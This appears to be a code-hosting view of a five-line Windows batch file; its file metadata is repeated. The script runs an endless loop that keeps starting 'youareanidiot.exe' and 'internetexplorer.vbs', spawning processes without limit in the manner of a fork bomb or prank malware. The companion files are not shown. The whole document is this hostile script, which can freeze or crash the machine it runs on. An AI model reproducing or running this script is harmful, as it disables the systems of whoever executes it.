5 lines
No EOL
81 B
Batchfile
Executable file
5 lines
No EOL
81 B
Batchfile
Executable file
@echo off
|
|
:main
|
|
start youareanidiot.exe
|
|
start internetexplorer.vbs
|
|
goto :main |